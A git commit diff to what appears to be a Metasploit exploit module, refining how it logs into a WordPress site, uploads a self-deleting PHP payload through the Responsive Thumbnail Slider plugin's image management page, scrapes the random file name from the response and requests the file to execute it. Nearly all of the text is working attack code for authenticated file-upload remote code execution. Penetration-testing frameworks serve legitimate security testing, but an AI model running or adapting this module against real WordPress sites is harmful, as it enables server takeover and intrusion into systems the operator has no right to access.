parsing for uploaded file, gets session

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-26 14:23:24 -05:00
parent c23ffcbf62
commit ed4c4046ba
1 changed files with 19 additions and 12 deletions


@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
])
end
@ -50,9 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
# check if plugin is installed
end
# log into Wordpress
# access 'manage images' page
# upload file
def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
@ -94,13 +91,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
def upload_payload(cookies)
file_payload = get_write_exec_payload
manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
file_payload = get_write_exec_payload(:unlink_self => true)
file_name = "#{rand_text_alpha(5)}.php"
# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
'uri' => normalize_uri(target_uri.path, manage_uri),
'cookie' => cookies
)
@ -114,20 +112,29 @@ class MetasploitModule < Msf::Exploit::Remote
data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
post_data = data.to_s
# upload the file
upload_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management&action=addedit'),
'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
#if upload_res.code == 200
# image_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'), 'cookie' => cookies)
#end
page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
res = send_request_raw(
'uri' => normalize_uri(target_uri.path.to_s, 'wp-content/uploads/wp-responsive-images-thumbnail-slider/02ac868d9fce78c048b2144beaba5d5c.php'),
retrieve_file(page, cookies)
end
def retrieve_file(res, cookies)
fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload")
execute = send_request_raw(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
)